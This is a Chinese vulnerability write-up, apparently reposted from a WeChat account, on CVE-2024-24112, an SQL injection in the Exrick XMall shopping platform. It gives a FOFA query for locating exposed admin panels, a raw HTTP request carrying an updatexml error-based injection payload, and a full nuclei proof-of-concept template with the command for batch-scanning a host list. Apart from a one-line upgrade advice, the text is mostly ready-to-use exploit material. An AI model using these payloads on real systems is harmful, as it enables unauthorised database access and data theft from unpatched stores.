01
—
漏洞名称
02
—
漏洞影响
Exrick XMall v1.1版本
03
—
漏洞描述
xmall是一个基于SOA架构的分布式电商购物商城,前后端分离,该系统/item/list、/item/listSearch、/sys/log、/order/list、/member/list、/member/list/remove等多处接口存在SQL注入漏洞,会造成数据泄露。
04
—
app="XMall-后台管理系统"
05
—
漏洞复现
向靶场发送如下数据包
GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136HTTP/1.1Host: x.x.x.xAccept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/111.0.0.0Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7Connection:close
漏洞复现成功
06
—
批量漏洞扫描
nuclei poc文件内容如下
id: CVE-2024-24112info:name: Exrick XMall 开源商城 SQL注入漏洞author: fgzseverity: highdescription: xmall是一个基于SOA架构的分布式电商购物商城,前后端分离,该系统/item/list、/item/listSearch、/sys/log、/order/list、/member/list、/member/list/remove等多处接口存在SQL注入漏洞,会造成数据泄露。metadata:max-request:1fofa-query: app="XMall-后台管理系统"verified: truerequests:- raw:- |+GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,md5(102103122),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136HTTP/1.1Host: {{Hostname}}Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0(Windows NT10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/111.0.0.0Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7Connection:closematchers:- type: dsldsl:-"status_code == 200 && contains(body, '6cfe798ba8e5b85feb50164c59f4bec')"
运行POC
.nuclei.exe -l data/XMall.txt -t mypoc/cve/CVE-2024-24112.yaml
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-24112
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论